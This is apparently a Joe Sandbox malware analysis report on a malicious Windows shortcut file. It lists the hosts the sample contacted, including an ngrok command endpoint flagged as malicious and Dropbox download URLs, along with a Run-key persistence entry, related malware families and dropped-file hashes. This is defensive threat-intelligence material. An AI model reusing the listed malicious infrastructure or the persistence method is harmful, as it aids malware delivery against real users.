https://www.dropbox.com/page_success/	powershell.exe, 00000003.00000002.1567473604.000001FB1D42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D49E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.0000024491AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000003.00000002.1567473604.000001FB1DDA7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc58175d1f0dd02d43497cae0960.dl.dropboxusercontent.com	powershell.exe, 00000003.00000002.1567473604.000001FB1D4AB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/7430a49b4ec2f1c77488485c5e23d0dd-UseBasicPars	powershell.exe, 00000003.00000002.1606620323.000001FB353C1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567213388.000001FB1B3C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1566337339.000001FB1B120000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567407242.000001FB1CD30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1566337339.000001FB1B20F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/pithos/	powershell.exe, 00000003.00000002.1567473604.000001FB1D42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D49E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.0000024491AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sales.dropboxbusiness.com/	powershell.exe, 00000003.00000002.1567473604.000001FB1D42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D49E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.0000024491AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://piriform.com/go/app_cc_privacy_policy	ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, 0000001C.00000000.1674049177.00000000005A5000.00000002.00000001.01000000.00000010.sdmp, ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, 0000001C.00000002.1896380216.00000000045C1000.00000004.00001000.00020000.00000000.sdmp, ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, 0000001C.00000002.1894916474.00000000005A5000.00000002.00000001.01000000.00000010.sdmp, ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, 0000001D.00000002.1864629783.00000000005A5000.00000002.00000001.01000000.00000010.sdmp	false		high
https://msn.com/	msedge.exe, 00000006.00000002.1527244445.00001448003AC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.1597363327.000030F000314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.dropbox.com/	powershell.exe, 00000003.00000002.1567473604.000001FB1D42E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D4AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1567473604.000001FB1D49E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.0000024491AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://uc80703d35970dc7916212c2d7a8.dl.dropboxusercontent.com/cd/0/get/Cghd1jtLzGlJHKX-9xdPSYuTZVa3	powershell.exe, 00000016.00000002.1711359093.00000244917DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.0000024491AD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1711359093.00000244917B4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.69.18	www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
162.125.69.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false
162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
142.250.181.65	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
104.161.43.18	unknown	United States	53755	IOFLOODUS	true
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
3.125.102.39	23glcrtmzxqgwfpq3oujitt.ngrok.pizza	United States	16509	AMAZON-02US	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
162.125.1.20	unknown	United States	19679	DROPBOXUS	false
162.125.4.18	unknown	United States	19679	DROPBOXUS	false
44.217.190.26	unknown	United States	14618	AMAZON-AESUS	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578256
Start date and time:	2024-12-19 13:43:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CNUXJvLcgw.lnk renamed because original name is a hash value
Original Sample Name:	cafffe9031f22c7bc030a5d9876112308f4aad44d4547f1801db261fcbb4c404.lnk
Detection:	MAL
Classification:	mal100.troj.evad.winLNK@78/287@21/13
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.42.16, 204.79.197.239, 13.107.21.239, 172.217.17.78, 13.107.6.158, 23.32.239.18, 23.32.239.56, 104.16.99.29, 104.16.100.29, 2.16.158.73, 2.16.158.83, 2.16.158.74, 2.16.158.90, 2.16.158.75, 2.16.158.88, 2.16.158.82, 2.16.158.96, 2.16.158.89, 217.20.58.100, 23.218.208.109, 2.19.198.8, 2.19.198.26, 199.232.210.172, 23.32.239.51, 23.32.239.26, 23.32.239.75, 23.32.239.8, 20.189.173.21, 142.251.40.131, 142.250.65.195, 142.251.40.195, 13.107.246.63, 94.245.104.56, 172.202.163.200, 23.57.90.154, 13.107.246.40, 23.198.214.137, 20.190.147.12
Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, slscr.update.microsoft.com, a416.dscd.akamai.net, edgeassetservice.afd.azureedge.net, cfl.dropboxstatic.com.cdn.cloudflare.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, www.gstatic.com, l-0007.l-msedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, blobcollector.events.data.trafficmanager.net, edgeassetservice.azureedge.net, umwatson.events.data.microsoft.com, clients.l.google.com, a1847.dscd.akamai.net, mira.config.skype.com, config.edge.skype.com.trafficmanager.net, time.windows.com, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www.bing.com.edgeke
Execution Graph export aborted for target ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, PID 5696 because there are no executed function
Execution Graph export aborted for target ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe, PID 7936 because there are no executed function
Execution Graph export aborted for target fontdrvhost.exe, PID 8172 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7560 because it is empty
Execution Graph export aborted for target powershell.exe, PID 9024 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:44:16	API Interceptor	217x Sleep call for process: powershell.exe modified
07:44:28	API Interceptor	2x Sleep call for process: svchost.exe modified
09:21:45	API Interceptor	1x Sleep call for process: WerFault.exe modified
15:21:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Nuinsa C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe
15:21:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Nuinsa C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.125.69.18	RFQ Letter and Instructions.pdf	Get hash	malicious	Unknown	Browse
	kjshdgacg18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	sldkjgsdGarDe3.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	jhsdfggga13.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	Garsdgwqa13de.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	https://t.ly/2PGC5	Get hash	malicious	Unknown	Browse
	hngarm13de02.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse
162.125.69.15	https://t.ly/2PGC5	Get hash	malicious	Unknown	Browse
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	pM3fQBuTLy.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	tasktow.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	162.159.61.3
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	162.159.61.3
	H3G7Xu6gih.exe	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	HI6VIJERUn.exe	Get hash	malicious	RHADAMANTHYS	Browse	162.159.61.3
	ko.ps1.2.ps1	Get hash	malicious	Unknown	Browse	162.159.61.3
	NativeApp_G5L1NHZZ.exe	Get hash	malicious	LummaC Stealer	Browse	172.64.41.3
fg.microsoft.map.fastly.net	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	ko.ps1.2.ps1	Get hash	malicious	Unknown	Browse	199.232.210.172
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	199.232.210.172
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.210.172
	KjECqzXLWp.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	cey4VIyGKh.lnk	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	1.8.182.26
	StGx54oFh6.exe	Get hash	malicious	Quasar	Browse	104.21.78.102
	https://nicholaspackaging.businesslawcloud.com/mTlFM	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	fAatfRnCZ5.exe	Get hash	malicious	Unknown	Browse	104.21.21.198
	1AqzGcCKey.exe	Get hash	malicious	Quasar	Browse	104.21.78.102
	http://efaktura.dhlecommerce.pl	Get hash	malicious	Unknown	Browse	104.18.86.42
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	172.67.179.109
	WTvNL75dCr.exe	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	WTvNL75dCr.exe	Get hash	malicious	Python BackDoor	Browse	104.20.22.46
	https://github.com/starise/win11-virtual-desktop-extension/releases/download/1.1.0/VirtualDesktopExtension-1.1.0.msi	Get hash	malicious	Unknown	Browse	1.1.1.1
DROPBOXUS	RFQ Letter and Instructions.pdf	Get hash	malicious	Unknown	Browse	162.125.21.1
	hnsjdghf18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	kjshdgacg18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	162.125.113.170
	sldkjgsdGarDe3.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	jhsdfggga13.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	Garsdgwqa13de.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	https://t.ly/2PGC5	Get hash	malicious	Unknown	Browse	162.125.69.15
	hngarm13de02.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	mjjt5kTb4o.lnk	Get hash	malicious	Unknown	Browse	162.125.65.18
DROPBOXUS	RFQ Letter and Instructions.pdf	Get hash	malicious	Unknown	Browse	162.125.21.1
	hnsjdghf18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.65.18
	kjshdgacg18.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	162.125.113.170
	sldkjgsdGarDe3.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	jhsdfggga13.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	Garsdgwqa13de.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	https://t.ly/2PGC5	Get hash	malicious	Unknown	Browse	162.125.69.15
	hngarm13de02.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	162.125.69.18
	mjjt5kTb4o.lnk	Get hash	malicious	Unknown	Browse	162.125.65.18

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	g1.ps1	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	LbtytfWpvx.vbs	Get hash	malicious	Remcos	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	YinLHGpoX4.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	raEyjKggAf.ps1	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	gCXzb0K8Ci.ps1	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	H2PspQWoHE.ps1	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	0iTxQouy7k.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	H6epOhxoPY.ps1	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15
	KcKtHBkskI.ps1	Get hash	malicious	Unknown	Browse	3.125.102.39 162.125.69.18 162.125.69.15

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.729015652256537
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqw:2JIB/wUKUKQncEmYRTwh0P/
MD5:	234F8E65DA3BC5DB5049B12A3B016B9D
SHA1:	0C8B5B2FF3B051C4638E4F97841CD00CB3587AD9
SHA-256:	04899C6D20387024744720F1E906699C67C96CB005F7AD0442ADF3C93A29394A
SHA-512:	04BFDC4E6C706BB7254C5A90ECA5A8471FACDB1A81A55FF0C0D6902A42C04ACB299520067AE29900E25F262C9EC59CE3EF37B01CD5BFB52B690D95DE3A1AB5D9
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.660144729333072
Encrypted:	false
SSDEEP:	96:e/FBw3e4qigKJIs3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/d2:c0/HnIxR0apYKjqzuiFJZ24lO8JO
MD5:	4C64AEBB50A4008C38780F8B99720F72
SHA1:	2456C1EDC14ED54DBC0A63968384822B52892597
SHA-256:	D219A54CA93EE680158A080090C8470A6C1BAA631FBBA2A5AA79DA8353BDDDB1
SHA-512:	E6B3C473B6C7E5F78EB50371A7AC3B05D0D8D68186CE9CD760BCAE31BCB9CD2D03E8A55658BD76B074AC3D1139DB50C1A926A133A434F2A88F7803965ED0E4F6
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.1.6.7.7.4.7.1.4.3.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.1.6.7.8.0.2.6.6.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.1.4.1.1.e.0.-.6.0.b.7.-.4.3.5.5.-.9.7.0.5.-.3.d.5.9.f.3.3.d.5.0.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.5.d.5.b.5.0.-.7.3.4.4.-.4.5.1.a.-.8.2.1.4.-.5.7.a.1.2.2.7.d.e.1.c.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.4.-.0.0.0.1.-.0.0.1.4.-.2.4.6.b.-.9.6.4.2.2.1.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45665
Entropy (8bit):	6.086719289954612
Encrypted:	false
SSDEEP:	768:cMkbJrT8IeQc5da9O1KKGf4iDdmwA9zjOrOYh/CioF7DRo+yM/42cRaLMos7O:cMk1rT8H1a5JrFFoF7VLyMV/Yosy
MD5:	AD9660A63F3C7622C563FC45C71C1A9A
SHA1:	E6BA71B35859614AC30A8B8339AC3911AD52EC42
SHA-256:	882F0AC0361F1B6812C59D56A150BC8D0BD9FDC571B308E19654FDE288F7D8B1
SHA-512:	2CE65C688FC04932557629937AF2AC27A68815266A5CE61B74FD3CD2C5EB66B077A1C81B81C994C64664469471BF01FBD38B1886706D965FB8ECED408364EA9D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1734612274"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	61147
Entropy (8bit):	5.078058244767499
Encrypted:	false
SSDEEP:	1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHCqdZJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPo
MD5:	CAC3D4FD8DBEA030ABA96F8F780736FB
SHA1:	A521D280279A587EAB48E40FE300B74091C63E23
SHA-256:	925201D27B013B74C70BB334EFC61D2F663E600FE67DBFB102CB4C0CA1429DBB
SHA-512:	FCF98E71FAC2D3B6C963DCDF1610F18F0640A109C8FCC442A4076665377E110E44969C7C0EC61BABE191DC5DA922A033508AA438E057C6CA41B1E05D4FBE7FA1
Malicious:	false
Preview:	PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

Process:	C:\Users\user\AppData\Local\Temp\ed1ca4d4-a6e3-4b51-8ce0-6f4ddefd62ee.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	979567147
Entropy (8bit):	0.041789185797822925
Encrypted:	false
SSDEEP:
MD5:	5C65CCC4E6024BB5AC70F33AD4ED7DEA
SHA1:	FE43DE74E55C42EC6087E1C4D433703D5765667D
SHA-256:	23B3CA8130145F8E625DECF73DE5B7D06BDEBDED7349EB459C9029C7797265A1
SHA-512:	AAEAB13AAF2C3900F81136EE90E9EFE8E0C49D64AEAAFF526EB547B7EDD14F067A46F2086D1AF0ABF39D585C38FD9274237ECB7F5B140825066479062CCA0C30
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn......@n.......n......Cn......Gn.......n......Wn......Kn......Pn......Ln..Qn..qo.......n....A.Pn..Qn).Pn......Pn..RichQn..........PE..L.....f...............!.....4#...................@..........................P-......D"...@.................................."..........p. ..............)...........w..p...........................@v..@............................................text............................... ..`.rdata...`.......T..................@..@.data....`...@...>... ..............@....rsrc...p. ....... ..^..............@..@................................................................................................................................................................................................................................................................................................................................

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
Entropy (8bit):	3.7264418862702895
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	CNUXJvLcgw.lnk
File size:	2'600 bytes
MD5:	e461bcf2c24690059f65197769c5e4b6
SHA1:	c475fb6243d45594dde23c46e3c2ddef0a24d358
